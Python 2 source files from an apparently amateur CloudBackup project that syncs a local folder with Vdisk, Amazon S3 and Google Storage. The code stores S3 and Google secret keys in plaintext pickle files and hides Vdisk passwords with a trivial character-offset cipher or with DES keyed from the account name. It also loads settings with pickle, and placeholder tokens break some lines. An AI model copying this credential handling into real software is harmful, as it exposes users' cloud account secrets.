cloud_path = self._ensure_cloud_path_legal(cloud_path)
if hasattr(self.client, 'owner'):
owner = self.client.owner
else:
owner = self.client.get_object(self.holder, cloud_path, acl=True)[0]
self.client.set_owner(owner)
grant = GSAclGrantByAllUsers(GS_ACL_PERMISSION.read)
self.client.put_object(self.holder, cloud_path, owner=owner, grants=(grant, ))
return gs_get_end_point(self.holder, cloud_path, True)
```
#### File: CloudBackup/CloudBackup/environment.py
```python
import threading
import os
try:
import cPickle as pickle
except ImportError:
import pickle
# from CloudBackup.lib.vdisk import VdiskClient, CryptoVdiskClient
from CloudBackup.client import VdiskClient, CryptoVdiskClient
from CloudBackup.lib.s3 import S3Client, CryptoS3Client
from CloudBackup.lib.gs import GSClient, CryptoGSClient
from CloudBackup.lib.errors import VdiskError, S3Error, GSError
from CloudBackup.lib.crypto import DES
from CloudBackup.cloud import VdiskStorage, S3Storage, GSStorage
from CloudBackup.local import SyncHandler, S3SyncHandler, VdiskRefreshToken
from CloudBackup.errors import CloudBackupError
from CloudBackup.utils import win_hide_file, get_info_path, ensure_folder_exsits
from CloudBackup.test.settings import VDISK_APP_KEY, VDISK_APP_SECRET
DEFAULT_SLEEP_MINUTS = 1
DEFAULT_SLEEP_SECS = DEFAULT_SLEEP_MINUTS * 60
OFFSET = 3
get_settings_path = lambda dirpath, setting_type: \
os.path.join(dirpath, '.%s.setting' % setting_type)
encrypt = lambda s: ','.join((str(ord(l) + OFFSET) for l in s))
decrypt = lambda s: ''.join((chr(int(l) - OFFSET) for l in s.split(',')))
def serilize(file_obj, content, encrypt_func, *encrypt_fields):
assert isinstance(content, dict)
for field in encrypt_fields:
if field in content:
content[field] = encrypt_func(content.pop(field))
pickle.dump(content, file_obj)
def unserilize(file_obj, decrypt_func, *decrypt_fields):
file_obj.seek(0)
content = pickle.load(file_obj)
for field in decrypt_fields:
if field in content:
print 'done!'
content[field] = decrypt_func(content.pop(field))
return content
def save_info(info_type, content, encrypt_func, *encrypt_fields):
folder_name = get_info_path()
ensure_folder_exsits(folder_name)
settings_path = get_settings_path(folder_name, info_type)
file_obj = open(settings_path, 'w+')
try:
serilize(file_obj, content, encrypt_func, *encrypt_fields)
finally:
file_obj.close()
def get_info(info_type, decrypt_func, *decrypt_fields):
folder_name = get_info_path()
settings_path = get_settings_path(folder_name, info_type)
if not os.path.exists(settings_path):
return
file_obj = open(settings_path, 'r')
try:
return unserilize(file_obj, decrypt_func, *decrypt_fields)
finally:
file_obj.close()
class Environment(object):
instance = None
vdisk_handler = None
vdisk_lock = threading.Lock()
vdisk_token_refresh = None
s3_handler = None
s3_lock = threading.Lock()
gs_handler = None
gs_lock = threading.Lock()
def __new__(cls, *args, **kwargs):
if not cls.instance:
cls.instance = super(Environment, cls).__new__(
cls, *args, **kwargs)
return cls.instance
def _get_iv(self, astr):
if len(astr) >= 8:
iv = astr[:8]
else:
iv = astr + '*' * (8 - len(astr))
return iv
def _get_encrypt(self, iv):
des = DES(iv)
return des.encrypt
def _get_decrypt(self, iv):
des = DES(iv)
return des.decrypt
def setup_vdisk(self, account, password, local_folder, holder, is_weibo=False,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.vdisk_lock.acquire()
if not force_stop and self.vdisk_handler:
return self.vdisk_handler
if force_stop and self.vdisk_handler:
self.vdisk_handler.stop()
if encrypt and encrypt_code:
client = CryptoVdiskClient(VDISK_APP_KEY, VDISK_APP_SECRET)
client.auth(account, password, encrypt_code, 'sinat' if is_weibo else 'local')
else:
client = VdiskClient(VDISK_APP_KEY, VDISK_APP_SECRET)
client.auth(account, password, '<PASSWORD>' if is_weibo else 'local')
self.vdisk_token_refresh = VdiskRefreshToken(client)
self.vdisk_token_refresh.setDaemon(True)
self.vdisk_token_refresh.start()
storage = VdiskStorage(client, holder_name=holder)
try:
handler = SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.vdisk_handler = handler
self.save_vdisk_info(account, password, local_folder, holder,
is_weibo, log, encrypt, encrypt_code)
return handler
except VdiskError, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.vdisk_lock.release()
def stop_vdisk(self, clear_info=True):
try:
self.vdisk_lock.acquire()
if self.vdisk_handler is None:
return
self.vdisk_handler.stop()
self.vdisk_handler = None
self.vdisk_token_refresh.stop()
self.vdisk_token_refresh = None
if clear_info:
self.remove_vdisk_info()
finally:
self.vdisk_lock.release()
def save_vdisk_info(self, account, password, local_folder, holder,
is_weibo=False, log=True, encrypt=False, encrypt_code=None):
if self.vdisk_handler is None:
return
args = locals()
del args['self']
save_info('vdisk', args, self._get_encrypt(self._get_iv(account)), 'password')
def load_vdisk_info(self):
info = get_info('vdisk', lambda s: s)
if info is None:
return
info['password'] = <PASSWORD>(self._get_iv(info['account']))(info.pop('password'))
return info
def remove_vdisk_info(self):
save_file = get_settings_path(get_info_path(), 'vdisk')
if os.path.exists(save_file):
os.remove(save_file)
def setup_s3(self, access_key, secret_access_key, local_folder, holder,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.s3_lock.acquire()
if self.s3_handler:
return self.s3_handler
if force_stop and self.s3_handler:
self.s3_handler.stop()
if encrypt and encrypt_code:
client = CryptoS3Client(access_key, secret_access_key, encrypt_code)
else:
client = S3Client(access_key, secret_access_key)
storage = S3Storage(client, holder)
try:
handler = S3SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.s3_handler = handler
self.save_s3_info(access_key, secret_access_key, local_folder, holder,
log, encrypt, encrypt_code)
return handler
except S3Error, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.s3_lock.release()
def stop_s3(self, clear_info=True):
try:
self.s3_lock.acquire()
if self.s3_handler is None:
return
self.s3_handler.stop()
self.s3_handler = None
if clear_info:
self.remove_s3_info()
finally:
self.s3_lock.release()
def save_s3_info(self, access_key, secret_access_key, local_folder, holder,
log=True, encrypt=False, encrypt_code=None):
if self.s3_handler is None:
return
args = locals()
del args['self']
save_info('s3', args, lambda s: s)
def load_s3_info(self):
info = get_info('s3', lambda s: s)
return info
def remove_s3_info(self):
save_file = get_settings_path(get_info_path(), 's3')
if os.path.exists(save_file):
os.remove(save_file)
def setup_gs(self, access_key, secret_access_key, project_id, local_folder, holder,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.gs_lock.acquire()
if self.gs_handler:
return self.gs_handler
if force_stop and self.gs_handler:
self.gs_handler.stop()
if encrypt and encrypt_code:
client = CryptoGSClient(access_key, secret_access_key, project_id, encrypt_code)
else:
client = GSClient(access_key, secret_access_key, project_id)
storage = GSStorage(client, holder)
try:
handler = SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.gs_handler = handler
self.save_gs_info(access_key, secret_access_key, project_id,
local_folder, holder, log, encrypt, encrypt_code)
return handler
except GSError, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.gs_lock.release()
def stop_gs(self, clear_info=True):
try:
self.gs_lock.acquire()
if self.gs_handler is None:
return
self.gs_handler.stop()
self.gs_handler = None
if clear_info:
self.remove_gs_info()
finally:
self.gs_lock.release()
def save_gs_info(self, access_key, secret_access_key, project_id,
local_folder, holder,
log=True, encrypt=False, encrypt_code=None):
if self.gs_handler is None:
return
args = locals()
del args['self']
save_info('gs', args, lambda s: s)
def load_gs_info(self):
info = get_info('gs', lambda s: s)
return info
def remove_gs_info(self):
save_file = get_settings_path(get_info_path(), 'gs')
if os.path.exists(save_file):
os.remove(save_file)
```
#### File: CloudBackup/lib/vdisk.py
```python
import urllib, urllib2
import time
import os
try:
import json # json is simplejson in 2.6+
except ImportError:
import simplejson as json
from errors import VdiskError
from utils import hmac_sha256_hex as hmac_sha256, encode_multipart
from crypto import DES
__author__ = "<NAME>"
__description__ = "A client for vdisk api, site: http://vdisk.me/api/doc"
__all__ = ['VdiskClient', 'CryptoVdiskClient']
endpoint = "http://openapi.vdisk.me/"
def _call(url_params, params, headers=None, method="POST", try_times=3, try_interval=3):
def _get_data():
if method == "GET":
if isinstance(params, str):
full_params = "&".join((url_params, params))
else:
full_params = "&".join((url_params, urllib.urlencode(params)))
path = "%s?%s" % (endpoint, full_params)
resp = urllib2.urlopen(path)
return json.loads(resp.read())
# if method is POST
path = "%s?%s" % (endpoint, url_params)
if isinstance(params, (str, unicode)):
encoded_params = params
else:
encoded_params = urllib.urlencode(params)
if headers is not None:
req = urllib2.Request(path, encoded_params, headers)
resp = urllib2.urlopen(req)
else:
resp = urllib2.urlopen(path, encoded_params)
return json.loads(resp.read())
for i in range(try_times):
try:
return _get_data()
except urllib2.URLError:
time.sleep(try_interval)
raise VdiskError(-1, "Can't connect to server")
def get_signature(data, app_secret):
data_str = '&'.join(['%s=%s' % (k, data[k]) for k in sorted(data)])
return hmac_sha256(app_secret, data_str)
class VdiskObject(dict):
def __getattr__(self, attr):
if attr in self:
obj = self[attr]
if isinstance(obj, list):
return [VdiskObject(itm) for itm in obj]
elif isinstance(obj, dict):
return VdiskObject(obj)
return obj
class VdiskClient(object):
'''
Vdisk client.
You can use it by the steps below:
client = VdiskClient('your_app_key', 'your_app_secret') # init
client.auth('your_account', 'your_password') # auth
client.upload_file('/from_path/file_name', 0, True) # call the vdisk api
'''
def __init__(self, app_key, app_secret):
'''
:param app_key: the app key of your vdisk api, the url is http://vdisk.me/api/addapp
:param app_secret: the app secret
'''
self.app_key = app_key
self.app_secret = app_secret
self.dologid = 0
def auth(self, account, password, app_type="local"):
'''
After init the VdiskClient object, you should auth with a user's account.
:param account: the user's account
:param password: <PASSWORD>
:param app_type: 'local' stands for the vdisk user as default,
and 'sinat' stands for the sina weibo user.
'''
self.account, self.password = account, password
self.token = self.get_token(account, password, app_type)
self._base_oper('a=keep', {'token': self.token}) # init dologid
def _base_oper(self, url_params, params, **kwargs):
result = _call(url_params, params, **kwargs)
if result['err_code'] != 0:
raise VdiskError(result['err_code'], result['err_msg'])
self.dologid = result['dologid']
ret_result = result.get('data', {})
ret_result['dologdir'] = result['dologdir']
return VdiskObject(ret_result)
def get_token(self, account, password, app_type="local"):
'''
Get token.
'''
params = {
'account': account,
'password': password,
'appkey': self.app_key,
'time': time.time()
}
params['signature'] = get_signature(params, self.app_secret)
if app_type != 'local':
params['app_type'] = app_type
result = _call('m=auth&a=get_token', params)
if result['err_code'] != 0:
raise VdiskError(result['err_code'], result['err_msg'])
return result['data']['token']
def keep(self):
'''
Keep alive.
'''
self._base_oper('a=keep', {'token': self.token,
'dologid': self.dologid})
def keep_token(self):
'''
Keep the token.
You have to do this operation every 10 to 15 minutes,
or the token will expire.
:return: the return data.
The example of return 0:
{
"uid":1000001
}
'''
return self._base_oper('m=user&a=keep_token', {'token': self.token,
'dologid': self.dologid})
def upload_file(self, filename, dir_id, cover, upload_name=None,
maxsize=10, callback=None, dir_=None,
encrypt=False, encrypt_func=None):
'''
Upload file.
:param filename: the absolute path of a file
:param dir_id: the id of the folder where the file upload to
:param cover: bool viriable, True if you want to cover the file which exists
:param upload_name(optional): the name of file when uploaded to vdisk, blank as local name
:param maxsize(optional): the max size, 10M as default
:param callback(optional): the redirect url, msg will be transfered if set
:param dir_(optional): the dir of file exsits, the param dir_id will be ignored if this is set.
:return:
The example
{
"fid":"168593",
"name":"MIME.txt",
"uid":"62",
"dir_id":0,
"do_dir":"0,82914,82915,82916,82917",
"ctime":1288781102,
"ltime":1288781102,
"size":40049,
"type":"text/plain",
"md5":"07c2e4630203b0425546091d044d608b",
"url":"http://openapi.vdisk.me/open_file/……"
}
'''
try:
if os.path.getsize(filename) > maxsize * (1024 ** 2):
raise VdiskError(-2, 'The file is larger than %dM' % maxsize)
except os.error:
raise VdiskError(-1, 'Can\'t access the file')
fp = open(filename, 'rb')
try:
params = {
'token': self.token,
'dir_id': dir_id,
'cover': 'yes' if cover else 'no',
'file': fp,
'dologid': self.dologid
}
if upload_name:
params['file'] = (fp, upload_name)
if callback:
params['callback'] = callback
if dir_:
params['dir'] = dir_
if encrypt and encrypt_func is not None:
params, boundary = encode_multipart(params, True, encrypt_func)
else:
params, boundary = encode_multipart(params)
headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary
}
return self._base_oper('m=file&a=upload_file', params, headers=headers)
finally:
fp.close()
def download_file(self, fid, filename, decrypt=False, decrypt_func=None):
'''
Download file by file id.
:param fid: file id
:param filename: the local path where file downloads to save
'''
data = self.get_file_info(fid)
url = data['s3_url']
fp = open(filename, 'wb')
try:
resp = urllib2.urlopen(url)
if decrypt and decrypt_func is not None:
fp.write(decrypt_func(resp.read()))
else:
fp.write(resp.read())
finally:
fp.close()
def create_dir(self, create_name, parent_id):
'''
:param create_name: dir name
:param parent_id: the parent dir id, 0 as the root dir
:return: the return data.
The example:
{
"dir_id":"35503",
"name":"\u6d4b\u8bd5",
"pid":0,
"uid":"62",
"ctime":1289271836,
"ltime":1289271836
}
'''
return self._base_oper('m=dir&a=create_dir', {
'token': self.token,
'create_name': create_name,
'parent_id': parent_id,
'dologid': self.dologid
})
def delete_dir(self, dir_id):
'''
:param dir_id: the dir id
'''
return self._base_oper('m=dir&a=delete_dir', {
'token': self.token,
'dir_id': dir_id,
'dologid': self.dologid
})
def rename_dir(self, dir_id, new_name):
'''
:param dir_id: dir id
:param new_name: new name of the dir
'''
return self._base_oper('m=dir&a=rename_dir', {
'token': self.token,
'dir_id': dir_id,
'new_name': new_name,
'dologid': self.dologid
})
def move_dir(self, dir_id, new_name, to_parent_id):
'''
:param dir_id: dir id
:param new_name: new name of the dir
:param to_parent_id: the parent dir id.
:return: the return data.
The example:
{
"name":"\u79fb\u52a8\u540e\u7684\u76ee\u5f55",
"dir_id":3929,
"parent_id":0
}
'''
return self._base_oper('m=dir&a=move_dir', {
'token': self.token,
'dir_id': dir_id,
'new_name': new_name,
'to_parent_id': to_parent_id,
'dologid': self.dologid
})
def getlist(self, dir_id, page=1, pageSize=1024):
'''
Get the list of an dir.
:param dir_id: dir id
:param page(optional): the page, 1 as default
:param pageSize(optional): the pageSize, 1024 as default and also if pageSize>=2 or pageSize<1024
:return: the return data.
The example:
{
"list":[
{
"id":"1190019",
"name":"test.php",
"dir_id":"0",
"ctime":"1294734798",
"ltime":"1294734798",
"size":"216 Bytes",
"type":"text\/php",
"md5":"0a706f2d0958838673dea185dd4290ed",
"sha1":"925b8e9a606ca5b3908ab3b53117e85ebcd35cd0",
"share":-1,
"byte":"216",
"length":"216",
"thumbnail":"http:\/\/……",//图片文件
"url":"http:\/\/……
},
……
],
"pageinfo":{
"page":1,
"pageSize":10,
"rstotal":19,
"pageTotal":2
}
}
'''
params = {'token': self.token,
'dir_id': dir_id,
'dologid': self.dologid}
if page > 1:
params['page'] = page
if 2 <= pageSize < 1024:
params['pageSize'] = pageSize
return self._base_oper('m=dir&a=getlist', params)
def get_quota(self):
'''
Get the status of your vdisk usage.
:return: the return data.
The example:
{
"used":"1330290823",
"total":"4294967296"
}
'''
return self._base_oper('m=file&a=get_quota', {'token': self.token,
'dologid': self.dologid})
def get_file_info(self, fid):
'''
:param fid: file id
:return: the return data.
The example:
{
"id":"219379", // 文件id
"name":"VS2008TeamSuite90DayTrialCHSX1429243.part4.rar", 文件名
"dir_id":"4280", // 目录id
"ctime":"1289267775", // 创建时间
"ltime":"1289267775", // 最后修改时间
"size":"734003200", // 大小,单位(B)
"type":"application\/x-rar-compressed",
"md5":"5cdad57bc23f64e17fd64b45e3bf3308",
"url":"http:\/\/openapi.vdisk.me\/open_file\/……", // 分享地址
"s3_url":"http:\/\/data.vdisk.me\/1245/" // 下载地址
}
'''
return self._base_oper('m=file&a=get_file_info', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def delete_file(self, fid):
'''
:param fid: file id
'''
return self._base_oper('m=file&a=delete_file', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def copy_file(self, fid, new_name, to_dir_id):
'''
:param fid: file id
:param new_name: new name of the file
:param to_dir_id: the id of dir which file copied to
:return: the return data.
The example:
{
"uid":"62",
"ctime":1289287059,
"ltime":1289287059,
"size":"734003200",
"type":"application\/x-rar-compressed",
"md5":"5cdad57bc23f64e17fd64b45e3bf3308",
"name":"\u526f\u672c.rar",
"dir_id":3929,
"fid":"222352",
"url":"http:\/\/openapi.vdisk.me\/open_file\/……"
}
'''
return self._base_oper('m=file&a=copy_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
'to_dir_id': to_dir_id,
'dologid': self.dologid})
def move_file(self, fid, new_name, to_dir_id):
'''
:param fid: file id
:param new_name: new name of the file
:param to_dir_id: the id of dir which file moved to
:return: the return data.
The example:
{
"name":"\u79fb\u52a8\u540e.rar",
"dir_id":3929,
"fid":219379,
"url":"http:\/\/openapi.vdisk.me\/ope……%A8%E5%90%8E.rar"
}
'''
return self._base_oper('m=file&a=move_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
'to_dir_id': to_dir_id,
'dologid': self.dologid})
def rename_file(self, fid, new_name):
'''
:param fid: file id
:param new_name: new name of the file
'''
return self._base_oper('m=file&a=rename_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
'dologid': self.dologid})
def share_file(self, fid, ip=None):
'''
:param fid: file id
:param new_name: new name of the file
:return: the return data.
The example:
{
"download_page":"http:\/\/vdisk.me\/?m=share&a=dow……"
}
'''
params = {'token': self.token,
'fid': fid,
'dologid': self.dologid
}
if ip is not None:
params['ip'] = ip
return self._base_oper('m=file&a=share_file', params)
def cancel_share_file(self, fid):
'''
:param fid: file id
'''
return self._base_oper('m=file&a=cancel_share_file', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def get_dirid_with_path(self, path):
'''
Get the dir id by the path of it.
:param path: path of the dir
:return: the dir id of path.
'''
return self._base_oper('m=dir&a=get_dirid_with_path', {
'token': self.token,
'path': path,
'dologid': self.dologid
})['id']
class CryptoVdiskClient(VdiskClient):
'''
Almost like VdiskClient, but supports uploading and downloading files with crypto.
Usage:
client = CryptoVdiskClient('your_app_key', 'your_app_secret') # init
client.auth('your_account', 'your_password', '<PASSWORD>') # auth, the third param's length must be 8
client.upload_file('/from_path/file_name', 0, True) # call the vdisk api
'''
def auth(self, account, password, IV, app_type="local"):
super(CryptoVdiskClient, self).auth(account, password, app_type)
self.des = DES(IV)
def upload_file(self, filename, dir_id, cover, upload_name='', maxsize=10, callback=None, dir_=None, encrypt=True):
return super(CryptoVdiskClient, self).upload_file(filename, dir_id, cover, upload_name,
maxsize, callback, dir_,
encrypt, self.des.encrypt)
def download_file(self, fid, filename, decrypt=True):
super(CryptoVdiskClient, self).download_file(fid, filename, decrypt, self.des.decrypt)
```
#### File: CloudBackup/CloudBackup/local.py
```python
import threading
import os
import time
import hashlib
import logging
from cloud import Storage, S3Storage
from utils import join_local_path, get_sys_encoding, get_info_path, ensure_folder_exsits
from CloudBackup.log import Log
from CloudBackup.lib.vdisk import VdiskClient
from CloudBackup.lib.errors import VdiskError, CloudBackupLibError, GSError, S3Error
SPACE_REPLACE = '#$&'
DEFAULT_SLEEP_MINUTS = 5
DEFAULT_SLEEP_SECS = DEFAULT_SLEEP_MINUTS * 60
class FileEntry(object):
def __init__(self, path, timestamp, md5, **kwargs):
self.path = path
self.timestamp = timestamp
self.md5 = md5
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.calc_md5 = lambda data: hashlib.md5(data).hexdigest()
def get_md5(self):
if self.md5:
return self.md5
if os.path.exists(self.path):
fp = open(self.path, 'rb')
try:
content = fp.read()
if hasattr(self, 'encrypt_func'):
content = self.encrypt_func(content)
md5 = self.calc_md5(content)
return md5
finally:
fp.close()
class VdiskRefreshToken(threading.Thread):
stopped = False
def __init__(self, client):
assert isinstance(client, VdiskClient)
super(VdiskRefreshToken, self).__init__()
self.client = client
def refresh_token(self):
self.client.keep_token()
def stop(self):
self.stopped = True
def run(self, sleep_minutes=10, sleep_interval=30):
count = 0
while not self.stopped:
if count == (sleep_minutes * 60 / sleep_interval):
self.refresh_token()
time.sleep(sleep_interval)
count += 1
class SyncHandler(threading.Thread):
stopped = False
def __init__(self, storage, folder_name,
loop=True, sec=DEFAULT_SLEEP_SECS, log=False, log_obj=None):
super(SyncHandler, self).__init__()
assert isinstance(storage, Storage)
self.storage = storage
self.folder_name = folder_name
self.loop = loop
self.sec = sec
self.encoding = get_sys_encoding()
self.calc_md5 = lambda data: hashlib.md5(data).hexdigest()
# init the error log
self.error_log = logging.getLogger()
info_path = get_info_path()
ensure_folder_exsits(info_path)
handler = logging.FileHandler(os.path.join(info_path, '.log'))
self.error_log.addHandler(handler)
self.error_log.setLevel(logging.DEBUG)
# init the action log
self.log = log
if log and log_obj:
self.log_obj = log_obj
elif log:
log_file = os.path.join(self.folder_name,
'.%s.log.txt' % self.storage.__class__.__name__.rsplit('Storage')[0].lower())
self.log_obj = Log(log_file)
def local_to_cloud(self, path, timestamp):
splits = path.rsplit('.', 1)
if len(splits) == 1:
splits.append(str(timestamp))
else:
splits.insert(-1, str(timestamp))
return '.'.join(splits).replace(' ', SPACE_REPLACE)
def cloud_to_local(self, path):
path = path.replace(SPACE_REPLACE, ' ')
splits = path.rsplit('.', 2)
if len(splits) == 2:
try:
timestamp = int(splits.pop(-1))
return splits[0], timestamp
except ValueError:
return path, -1
elif len(splits) == 3:
try:
timestamp = int(splits.pop(-2))
return '.'.join(splits), timestamp
except ValueError:
return path, -1
else:
return path, -1
def list_cloud(self, cloud_path, recursive=False):
for f in self.storage.list(cloud_path, recursive):
f.cloud_path = f.path
path, _ = self.cloud_to_local(f.path)
path = path.encode('utf-8')
f.path = path
yield f
def _get_cloud_files(self):
files = {}
for f in self.storage.list_files('', True):
path, timestamp = self.cloud_to_local(f.path)
path = path.encode('utf-8')
files[path] = FileEntry(f.path, timestamp, f.md5)
return files
def _is_folder_exclude(self, folder_name):
for name in folder_name.split(os.sep):
if name.startswith('.'):
return True
return False
def _get_local_files(self):
files = {}
folder_name = self.folder_name if self.folder_name.endswith(os.sep) \
else self.folder_name+os.sep
for dirpath, dirnames, filenames in os.walk(self.folder_name):
if self._is_folder_exclude(dirpath):
continue
for filename in filenames:
if filename.startswith('.'):
continue
abs_filename = os.path.join(dirpath, filename)
rel_path = abs_filename.split(folder_name, 1)[1]
if isinstance(rel_path, unicode):
rel_path = rel_path.encode('utf-8')
else:
rel_path = rel_path.decode(self.encoding).encode('utf-8')
timestamp = int(os.path.getmtime(abs_filename))
if hasattr(self.storage.client, 'des'):
func = self.storage.client.des.encrypt
entry = FileEntry(abs_filename, timestamp, None, encrypt_func=func)
else:
entry = FileEntry(abs_filename, timestamp, None)
if os.sep == '/':
files[rel_path] = entry
else:
files[rel_path.replace(os.sep, '/')] = entry
return files
def _upload(self, f, local_files_tm, cloud_files_tm):
entry = local_files_tm[f]
filename, timestamp = entry.path, entry.timestamp
cloud_path = self.local_to_cloud(f, timestamp)
def _action(try_times=3, sleep_sec=3):
tries = 0
while tries <= try_times:
try:
self.storage.upload(cloud_path, filename)
break
except VdiskError, e:
if e.err_no == 6 or e.err_no == 5:
time.sleep(sleep_sec)
tries += 1
else:
raise e
except GSError, e:
self.error_log.info('upload file %s happens an error.' % f)
raise e
_action()
if self.log:
self.log_obj.write('上传了文件:%s' % f)
def _download(self, f, local_files_tm, cloud_files_tm):
filename = join_local_path(self.folder_name,
f.decode('utf-8'))
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
cloud_path = cloud_files_tm[f].path
self.storage.download(cloud_path, filename)
if self.log:
self.log_obj.write('下载了文件:%s' % f)
def sync(self):
try:
local_files_tm = self._get_local_files()
cloud_files_tm = self._get_cloud_files()
local_files = set(local_files_tm.keys())
cloud_files = set(cloud_files_tm.keys())
for f in (local_files - cloud_files):
if self.stopped: return
self._upload(f, local_files_tm, cloud_files_tm)
for f in (cloud_files - local_files):
if self.stopped: return
self._download(f, local_files_tm, cloud_files_tm)
for f in (cloud_files & local_files):
if self.stopped: return
local_entry = local_files_tm[f]
cloud_entry = cloud_files_tm[f]
if local_entry.get_md5() != cloud_entry.get_md5():
if local_entry.timestamp < cloud_entry.timestamp:
self._download(f, local_files_tm, cloud_files_tm)
elif local_entry.timestamp > cloud_entry.timestamp:
self._upload(f, local_files_tm, cloud_files_tm)
except CloudBackupLibError, e:
self.error_log.exception(str(e))
def stop(self):
self.stopped = True
def run(self):
if self.folder_name is None or \
len(self.folder_name) == 0:
return
self.sync()
while self.loop and not self.stopped:
time.sleep(self.sec)
self.sync()
class S3SyncHandler(SyncHandler):
def __init__(self, storage, folder_name, loop=True, sec=DEFAULT_SLEEP_SECS,
log=False, log_obj=None):
super(S3SyncHandler, self).__init__(storage, folder_name, loop, sec, log, log_obj)
assert isinstance(storage, S3Storage)
def list_cloud(self, cloud_path, recursive=False):
for f in self.storage.list(cloud_path, recursive):
f.cloud_path = f.path
path, _ = self.cloud_to_local(f.path)
if isinstance(path, str):
path = path.decode('raw-unicode-escape').encode('utf-8')
elif isinstance(path, unicode):
path = path.encode('utf-8')
f.path = path
yield f
def _get_cloud_files(self):
files = {}
for f in self.storage.list_files('', True):
path, timestamp = self.cloud_to_local(f.path)
if isinstance(path, str):
path = path.decode('raw-unicode-escape').encode('utf-8')
elif isinstance(path, unicode):
path = path.encode('utf-8')
files[path] = FileEntry(f.path, timestamp, f.md5)
return files
def _upload(self, f, local_files_tm, cloud_files_tm):
entry = local_files_tm[f]
filename, timestamp = entry.path, entry.timestamp
f_ = f.decode('utf-8').encode('raw-unicode-escape')
cloud_path = self.local_to_cloud(f_, timestamp)
try:
self.storage.upload(cloud_path, filename)
except S3Error, e:
self.error_log.info('upload file %s happens an error.' % f)
raise e
if self.log:
self.log_obj.write('上传了文件:%s' % f)
```
#### File: CloudBackup/CloudBackup/log.py
```python
import os
import time
from utils import win_hide_file
class Log(object):
def __init__(self, log_file, hide=True):
self.log_file = log_file
self.hide = hide
def _win_hide(self):
if self.hide:
win_hide_file(self.log_file)
def _ensure_folder_exsits(self):
dirname = os.path.dirname(self.log_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
def write(self, itm):
self._ensure_folder_exsits()
fp = open(self.log_file, 'a+')
try:
time_str = time.strftime("%Y-%m-%d %X", time.localtime())
content = '%s %s\n' % (time_str, itm)
fp.write(content)
self._win_hide()
finally:
fp.close()
def write_logs(self, itms):
self._ensure_folder_exsits()
fp = open(self.log_file, 'a+')
try:
for itm in itms:
time_str = time.strftime("%Y-%m-%d %X", time.localtime())
content = '%s %s\n' % (time_str, itm)
fp.write(content)
self._win_hide()
finally:
fp.close()
def get_logs(self):
if not os.path.exists(self.log_file):
yield
fp = open(self.log_file)
for itm in reversed(fp.readlines()):
content = itm.strip()
if len(content) > 0:
yield content
```
#### File: CloudBackup/ui/main.py
```python
import os
import threading
import time
from PyQt4 import QtCore ,QtGui
from CloudBackup.environment import Environment
from CloudBackup.lib.errors import VdiskError, S3Error, GSError, CloudBackupLibError
from CloudBackup.cloud import CloudFile, CloudFolder
import CloudBackup.mail
import CloudBackup_UI
import VDiskLogin_UI
import VDiskShare_UI
import S3Login_UI
import S3Share_UI
import GoogleCloudLogin_UI
import GoogleCloudShare_UI
class CloudBrowserFlushThread(QtCore.QThread):
def __init__(self, base_ui, browser_ui, handler):
super(CloudBrowserFlushThread, self).__init__()
self.base_ui = base_ui
self.ui = browser_ui
self.handler = handler
self.stopped = False
def generate_cloud_tree(self, path='', parent=None):
"""
show the files that synchronized with the cloud
"""
if self.handler is None or self.stopped:
return
if parent is None:
return
for itm in self.handler.list_cloud(path):
if itm is None or self.stopped: return
try:
widget_itm = QtGui.QTreeWidgetItem(parent)
widget_itm.setText(0,
QtCore.QString(itm.path.split('/')[-1].decode('utf-8')))
if isinstance(itm, CloudFile):
widget_itm.setToolTip(0, QtCore.QString(itm.cloud_path))
elif isinstance(itm, CloudFolder):
self.generate_cloud_tree(itm.cloud_path, widget_itm)
except RuntimeError:
pass
def cloud_browser_flush(self):
root = self.base_ui.add_root_to_cloud_browser(self.ui)
try:
self.generate_cloud_tree(parent=root)
except CloudBackupLibError, e:
self.handler.error_log.exception(str(e))
def run(self):
self.cloud_browser_flush()
def stop(self):
self.stopped = True
class LogFlushThread(QtCore.QThread):
def __init__(self, ui, handler):
super(LogFlushThread, self).__init__()
self.ui = ui
self.handler = handler
self.stopped = False
def show_logs(self):
if self.handler is None or self.stopped:
return
if self.stopped: return
for log in self.handler.log_obj.get_logs():
if log is None or self.stopped: return
splits = log.split(' ', 2)
if len(splits) == 3:
stime = ' '.join((splits[i] for i in range(2)))
saction = splits[2]
log = QtGui.QTreeWidgetItem(self.ui)
log.setText(0, QtCore.QString(stime))
log.setText(1, QtCore.QString(saction.decode('utf-8')))
def run(self):
self.show_logs()
def stop(self):
self.stopped = True
class UI(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self,parent)
self.ui = CloudBackup_UI.Ui_CloudBackupUI()
self.ui.setupUi(self)
self.env = Environment()
self.vdisk_handler = None
self.s3_handler = None
self.gs_handler = None
self.vdisk_info = self.env.load_vdisk_info()
self.s3_info = self.env.load_s3_info()
self.gs_info = self.env.load_gs_info()
self.vdisk_cloud_browser_thread = None
self.vdisk_cloud_browser_thread_lock = threading.Lock()
self.vdisk_log_thread = None
self.vdisk_log_thread_lock = threading.Lock()
self.s3_cloud_browser_thread = None
self.s3_cloud_browser_thread_lock = threading.Lock()
self.s3_log_thread = None
self.s3_log_thread_lock = threading.Lock()
self.gs_cloud_browser_thread = None
self.gs_cloud_browser_thread_lock = threading.Lock()
self.gs_log_thread = None
self.gs_log_thread_lock = threading.Lock()
self.vdisk_init()
